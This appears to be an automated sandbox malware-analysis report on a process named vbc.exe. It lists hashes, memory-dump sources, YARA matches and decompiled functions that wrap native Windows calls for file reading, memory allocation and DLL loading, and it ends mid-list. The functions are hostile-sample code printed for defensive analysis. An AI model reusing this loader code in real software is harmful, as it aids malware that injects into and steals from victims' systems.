                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.413759807.000000000017D000.00000040.00000001.sdmp, Offset: 0017D000, based on PE: false
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 66192307e04ab8b26bf3784d38e4cae8d7a1976d0794666f65c36dd069de3527
                                                              • Instruction ID: 5ab546e25a0009607c35366b6a82a108673942d8dfe6d0fcb04315dfbb0ca441
                                                              • Opcode Fuzzy Hash: 66192307e04ab8b26bf3784d38e4cae8d7a1976d0794666f65c36dd069de3527
                                                              • Instruction Fuzzy Hash: 8E01F7314083089AD7109A65EC84B67FBFCEF51724F18C45AED091B283C335D845D6B1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0017D1C0, Relevance: .0, Instructions: 36COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.413759807.000000000017D000.00000040.00000001.sdmp, Offset: 0017D000, based on PE: false
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6b13dd0fd21557868e3fa544b599c61b9b5a52d80f033aded9e72c453ddc0f98
                                                              • Instruction ID: 9931dffd4bdb062943b20ccc1cae7f927d617f7c22ec2232717046753a1718cb
                                                              • Opcode Fuzzy Hash: 6b13dd0fd21557868e3fa544b599c61b9b5a52d80f033aded9e72c453ddc0f98
                                                              • Instruction Fuzzy Hash: BBF04F76404644ABEB108A15D888B66FFE8EF51724F28C45AFD085B283C3799C45CAB1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Non-executed Functions

                                                              Function 0045655F, Relevance: 2.6, Strings: 2, Instructions: 109COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.413862447.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false
                                                              Similarity
                                                              • API ID:
                                                              • String ID: LgsX$UUUU
                                                              • API String ID: 0-1207212886
                                                              • Opcode ID: 06ad4c5fb7fba0e003242144a04e315f6e70bf5950c81ca9ca39675753a5aaa7
                                                              • Instruction ID: b8620f2433f170d70a244f26f003a41029bafa9e68898aafa4868d5e950e0be6
                                                              • Opcode Fuzzy Hash: 06ad4c5fb7fba0e003242144a04e315f6e70bf5950c81ca9ca39675753a5aaa7
                                                              • Instruction Fuzzy Hash: E4514C71E106688FDB94CFACC884ACDBBF2BB49314F5486A9D018FB215D7349985CF15
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0109A2A9, Relevance: .9, Instructions: 896COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.415035923.0000000001092000.00000020.00020000.sdmp, Offset: 01090000, based on PE: true
                                                              • Associated: 00000003.00000002.415024400.0000000001090000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000003.00000002.415164595.0000000001146000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 19ff0009a3c968d98fd90668b3a3a664d25a6aab53ee2b7e982bc80375fb09c3
                                                              • Instruction ID: e96bb5d92a3f5442f7b6e4a905fdb18c71a115660f7474629bef9f04b26d45d7
                                                              • Opcode Fuzzy Hash: 19ff0009a3c968d98fd90668b3a3a664d25a6aab53ee2b7e982bc80375fb09c3
                                                              • Instruction Fuzzy Hash: D362476144F7C19FCB534B785DB56E2BFB1AE6721871E44CBC4C08F0A3E229195AE722
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00455918, Relevance: .1, Instructions: 149COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.413862447.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: aca7d7035d407ef40ee1ef52f98287d13b024bd4a53b5d4cf6170293ccf6f1dc
                                                              • Instruction ID: 243f99f96871530b66d11c91bf091c84fcf6d28140db16bc2f96588ac0ae21be
                                                              • Opcode Fuzzy Hash: aca7d7035d407ef40ee1ef52f98287d13b024bd4a53b5d4cf6170293ccf6f1dc
                                                              • Instruction Fuzzy Hash: 8A517170D012088FD744EFB9E850A9DBBF3AF89304F04C979D0149B665EB746A4ADB91
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00455928, Relevance: .1, Instructions: 144COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.413862447.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5327cf0b2862aa9b1c808a181ecab3a6024a158d9beb234b9111e0364f40120b
                                                              • Instruction ID: e6c40a80ef81ca91e96f36705250bf961bec9e001746ef91a8b8c0bcf1a19cdd
                                                              • Opcode Fuzzy Hash: 5327cf0b2862aa9b1c808a181ecab3a6024a158d9beb234b9111e0364f40120b
                                                              • Instruction Fuzzy Hash: 75515E70D012088FD744EFB9D890A9DBBF3AF89308F00C979D0149B665EB746A4ADBD1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00455B78, Relevance: .1, Instructions: 99COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.413862447.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6ad36a984d93ec08ee312626b7cf146148c60975db4ff16b72239dc2e26c46de
                                                              • Instruction ID: de2049dd5b8e44dee1fba2a1801021a14812b5a362a16d987890d44b6dac1626
                                                              • Opcode Fuzzy Hash: 6ad36a984d93ec08ee312626b7cf146148c60975db4ff16b72239dc2e26c46de
                                                              • Instruction Fuzzy Hash: 504134B1E00A588BEB5CCF6B8C4079EFAF7AFC9301F14C1BA890CAA255DB7415858F15
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Analysis Process: vbc.exe PID: 2412 Parent PID: 2652 vbc.exeCOMMON

                                                              Executed Functions

                                                              Function 0041A40A, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 37filenativeCOMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 37%
                                                              			E0041A40A(void* __eax, intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, char _a40) {
				void* _t20;
				void* _t29;
				intOrPtr* _t31;
				void* _t33;

				_t15 = _a4;
				_t31 = _a4 + 0xc48;
				E0041AF60(_t29, _t15, _t31,  *((intOrPtr*)(_t15 + 0x10)), 0, 0x2a);
				_t4 =  &_a40; // 0x414a31
				_t6 =  &_a32; // 0x414d72
				_t12 =  &_a8; // 0x414d72
				_t20 =  *((intOrPtr*)( *_t31))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36,  *_t4, 0x55c68072, _t33); // executed
				return _t20;
			}







                                                              0x0041a413
                                                              0x0041a41f
                                                              0x0041a427
                                                              0x0041a42c
                                                              0x0041a432
                                                              0x0041a44d
                                                              0x0041a455
                                                              0x0041a459

                                                              APIs
                                                              • NtReadFile.NTDLL(rMA,5EB65239,FFFFFFFF,?,?,?,rMA,?,1JA,FFFFFFFF,5EB65239,00414D72,?,00000000), ref: 0041A455
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.482472873.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              Yara matches
                                                              Similarity
                                                              • API ID: FileRead
                                                              • String ID: 1JA$rMA$rMA
                                                              • API String ID: 2738559852-782607585
                                                              • Opcode ID: b0b945ea7ac9c0154c7bd539085f630498a042f42791842d782ade54bdc43549
                                                              • Instruction ID: ab0f2a686f6ba0e30151440379a14482089342f8888276c55892b2385d88771f
                                                              • Opcode Fuzzy Hash: b0b945ea7ac9c0154c7bd539085f630498a042f42791842d782ade54bdc43549
                                                              • Instruction Fuzzy Hash: 7AF0F4B2200108ABCB14DF89DC80EEB77A9EF8C754F158648BE0DA7241C630ED51CBA0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0041A410, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36filenativeCOMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 37%
                                                              			E0041A410(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, char _a40) {
				void* _t18;
				void* _t27;
				intOrPtr* _t28;

				_t13 = _a4;
				_t28 = _a4 + 0xc48;
				E0041AF60(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t4 =  &_a40; // 0x414a31
				_t6 =  &_a32; // 0x414d72
				_t12 =  &_a8; // 0x414d72
				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36,  *_t4); // executed
				return _t18;
			}






                                                              0x0041a413
                                                              0x0041a41f
                                                              0x0041a427
                                                              0x0041a42c
                                                              0x0041a432
                                                              0x0041a44d
                                                              0x0041a455
                                                              0x0041a459

                                                              APIs
                                                              • NtReadFile.NTDLL(rMA,5EB65239,FFFFFFFF,?,?,?,rMA,?,1JA,FFFFFFFF,5EB65239,00414D72,?,00000000), ref: 0041A455
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.482472873.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              Yara matches
                                                              Similarity
                                                              • API ID: FileRead
                                                              • String ID: 1JA$rMA$rMA
                                                              • API String ID: 2738559852-782607585
                                                              • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                              • Instruction ID: c6e97d42c3e85b78cd3a41c20c82dd28da71633a8e67c8174f08c115ef6e08ba
                                                              • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                              • Instruction Fuzzy Hash: 87F0B7B2200208AFCB14DF89DC81EEB77ADEF8C754F158249BE1D97241D630E851CBA4
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0040ACF0, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 100%
                                                              			E0040ACF0(void* __eflags, void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t30;
				void* _t31;
				void* _t32;

				_t24 = _a8;
				_v8 =  &_v536;
				_t15 = E0041CC50( &_v12, 0x104, _a8);
				_t31 = _t30 + 0xc;
				if(_t15 != 0) {
					_t17 = E0041D070(_v8, _t24, __eflags, _v8);
					_t32 = _t31 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						E0041D2F0( &_v12, 0);
						_t32 = _t32 + 8;
					}
					_t18 = E0041B4A0(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}













                                                              0x0040acf9
                                                              0x0040ad0c
                                                              0x0040ad0f
                                                              0x0040ad14
                                                              0x0040ad19
                                                              0x0040ad23
                                                              0x0040ad28
                                                              0x0040ad2b
                                                              0x0040ad2d
                                                              0x0040ad35
                                                              0x0040ad3a
                                                              0x0040ad3a
                                                              0x0040ad41
                                                              0x0040ad49
                                                              0x0040ad4c
                                                              0x0040ad4e
                                                              0x0040ad62
                                                              0x00000000
                                                              0x0040ad64
                                                              0x0040ad6a
                                                              0x0040ad1e
                                                              0x0040ad1e
                                                              0x0040ad1e

                                                              APIs
                                                              • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD62
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.482472873.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Load
                                                              • String ID:
                                                              • API String ID: 2234796835-0
                                                              • Opcode ID: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                                                              • Instruction ID: bd03027937dafe21d6f438616a486266aae6a772261e1344982784e00def1180
                                                              • Opcode Fuzzy Hash: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                                                              • Instruction Fuzzy Hash: 80015EB5E0020DBBDF10DBA1DC42FDEB3789F54308F0045AAA908A7281F634EB548B95
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0041A360, Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 100%
                                                              			E0041A360(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;
				void* _t31;

				_t3 = _a4 + 0xc40; // 0xc40
				E0041AF60(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}





                                                              0x0041a36f
                                                              0x0041a377
                                                              0x0041a3ad
                                                              0x0041a3b1

                                                              APIs
                                                              • NtCreateFile.NTDLL(00000060,00409CF3,?,00414BB7,00409CF3,FFFFFFFF,?,?,FFFFFFFF,00409CF3,00414BB7,?,00409CF3,00000060,00000000,00000000), ref: 0041A3AD
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.482472873.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CreateFile
                                                              • String ID:
                                                              • API String ID: 823142352-0
                                                              • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                              • Instruction ID: 1571a74e51eef41835f20cf1113afde9e84efeac6e640e2865a3d9423fa4fe5b
                                                              • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                              • Instruction Fuzzy Hash: FEF0BDB2201208ABCB08CF89DC85EEB77ADAF8C754F158248BA0D97241C630E8518BA4
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0041A53C, Relevance: 1.5, APIs: 1, Instructions: 31memorynativeCOMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 100%
                                                              			E0041A53C(void* __ecx, signed int __edi, intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t17;

				 *(__ecx + 0x55) =  *(__ecx + 0x55) & __edi;
				_t13 = _a4;
				_t5 = _t13 + 0xc60; // 0xca0
				E0041AF60(__edi, _a4, _t5,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t17 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t17;
			}




                                                              0x0041a53e
                                                              0x0041a543
                                                              0x0041a54f
                                                              0x0041a557
                                                              0x0041a579
                                                              0x0041a57d

                                                              APIs
                                                              • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B134,?,00000000,?,00003000,00000040,00000000,00000000,00409CF3), ref: 0041A579
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.482472873.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AllocateMemoryVirtual
                                                              • String ID:
                                                              • API String ID: 2167126740-0
                                                              • Opcode ID: 6a87fa68acc742cbafd9a53053ce36e74d75ca4c3e0762fc499327b1afa3e1ac
                                                              • Instruction ID: 533771b94bd3c33c6fbbac88a19233b85bb76ba884f0643547e4572e5c36d793
                                                              • Opcode Fuzzy Hash: 6a87fa68acc742cbafd9a53053ce36e74d75ca4c3e0762fc499327b1afa3e1ac
                                                              • Instruction Fuzzy Hash: 1CF0F2B6210208ABDB18DF89CC81EEB77ADEF88754F158149FA1897241C631E912CBA0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0041A540, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 100%
                                                              			E0041A540(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;
				void* _t21;

				_t3 = _a4 + 0xc60; // 0xca0
				E0041AF60(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}





                                                              0x0041a54f
                                                              0x0041a557
                                                              0x0041a579
                                                              0x0041a57d

                                                              APIs
                                                              • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B134,?,00000000,?,00003000,00000040,00000000,00000000,00409CF3), ref: 0041A579
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.482472873.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AllocateMemoryVirtual
                                                              • String ID:
                                                              • API String ID: 2167126740-0
                                                              • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                              • Instruction ID: 60dc777ab2a5703fe93ec60752bbea5a413bae98553eb5929f98badcd8fbe991
                                                              • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                              • Instruction Fuzzy Hash: B2F015B2200208ABCB14DF89CC81EEB77ADEF8C754F158149BE0897241C630F811CBA4
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0041A490, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 100%
                                                              			E0041A490(intOrPtr _a4, void* _a8) {
				long _t8;
				void* _t11;

				_t5 = _a4;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x40a943
				E0041AF60(_t11, _a4, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}





                                                              0x0041a493
                                                              0x0041a496
                                                              0x0041a49f
                                                              0x0041a4a7
                                                              0x0041a4b5
                                                              0x0041a4b9

                                                              APIs
                                                              • NtClose.NTDLL(00414D50,?,?,00414D50,00409CF3,FFFFFFFF), ref: 0041A4B5
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.482472873.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Close
                                                              • String ID:
                                                              • API String ID: 3535843008-0
                                                              • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                              • Instruction ID: a008c5d5ec14fa9f5013d94ab86a46559dd82bf248144eb087863a0ac6a31d62
                                                              • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                              • Instruction Fuzzy Hash: F7D01776200218ABD710EB99CC85EE77BACEF48B64F158499BA1C9B242C530FA1086E0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00A400C4, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.483166029.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true
                                                              • Associated: 00000004.00000002.483127572.0000000000A20000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483372699.0000000000B10000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483377274.0000000000B20000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483382029.0000000000B24000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483386374.0000000000B27000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483390637.0000000000B30000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483434447.0000000000B90000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                              • Instruction ID: e6c77262f5ba2182d122b5874ee39bb292c5f7eee28c199429390ea98cabeb31
                                                              • Opcode Fuzzy Hash: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                              • Instruction Fuzzy Hash: 79B01272100940C7E309D724DD06F4B7210FFC0F01F008A3EA00B81851DA38A93CC846
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00A40078, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.483166029.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true
                                                              • Associated: 00000004.00000002.483127572.0000000000A20000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483372699.0000000000B10000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483377274.0000000000B20000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483382029.0000000000B24000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483386374.0000000000B27000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483390637.0000000000B30000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483434447.0000000000B90000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
                                                              • Instruction ID: 3a645d05db048e5a2937cf36c3d58d647fc753ae06e93f94360992995f7f05c0
                                                              • Opcode Fuzzy Hash: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
                                                              • Instruction Fuzzy Hash: 2AB012B1504640C7F304F704D905B16B212FBD0F00F408938A14F86591D73DAD2CC78B
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00A40048, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.483166029.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true
                                                              • Associated: 00000004.00000002.483127572.0000000000A20000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483372699.0000000000B10000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483377274.0000000000B20000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483382029.0000000000B24000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483386374.0000000000B27000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483390637.0000000000B30000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483434447.0000000000B90000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
                                                              • Instruction ID: 41e4343c146f66e2bb318e135f4e172b2897deff735033a37a94e91f6413aa4b
                                                              • Opcode Fuzzy Hash: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
                                                              • Instruction Fuzzy Hash: DBB012B2100540C7E3099714D946B4B7210FB90F00F40C93BA11B81861DB3C993CD46A
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00A3F9F0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.483166029.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true
                                                              • Associated: 00000004.00000002.483127572.0000000000A20000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483372699.0000000000B10000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483377274.0000000000B20000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483382029.0000000000B24000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483386374.0000000000B27000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483390637.0000000000B30000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483434447.0000000000B90000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                              • Instruction ID: 864711eabb7dc0f9c0a00528bc7204798e3bbfe8ecaf20bba7921b9fd7ea0c89
                                                              • Opcode Fuzzy Hash: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                              • Instruction Fuzzy Hash: B8B012B2200640C7F3199714D90AF4BB310FBD0F00F00CA3AA00781890DA3C992CC44A
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00A3F900, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.483166029.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true
                                                              • Associated: 00000004.00000002.483127572.0000000000A20000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483372699.0000000000B10000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483377274.0000000000B20000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483382029.0000000000B24000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483386374.0000000000B27000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483390637.0000000000B30000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483434447.0000000000B90000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                              • Instruction ID: 05ac91611fc184a3f88202f4b9a2f722369f22817df951cee1fa85cf63676e78
                                                              • Opcode Fuzzy Hash: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                              • Instruction Fuzzy Hash: A2B01272605540C7F30ADB04D915B467251FBC0F00F408934E50746590D77D9E38D587
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00A3FAE8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.483166029.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true
                                                              • Associated: 00000004.00000002.483127572.0000000000A20000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483372699.0000000000B10000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483377274.0000000000B20000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483382029.0000000000B24000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483386374.0000000000B27000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483390637.0000000000B30000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483434447.0000000000B90000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                              • Instruction ID: bb22edd625d441e86b4201bf2007cb1784deb073e32f09f3a807e6c8f80ed535
                                                              • Opcode Fuzzy Hash: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                              • Instruction Fuzzy Hash: ACB01272104544C7F3099714ED06B8B7210FB80F00F00893AA007828A1DB39992CE456
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00A3FAD0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.483166029.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true
                                                              • Associated: 00000004.00000002.483127572.0000000000A20000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483372699.0000000000B10000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483377274.0000000000B20000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483382029.0000000000B24000.00000040.00000001.sdmp Download File
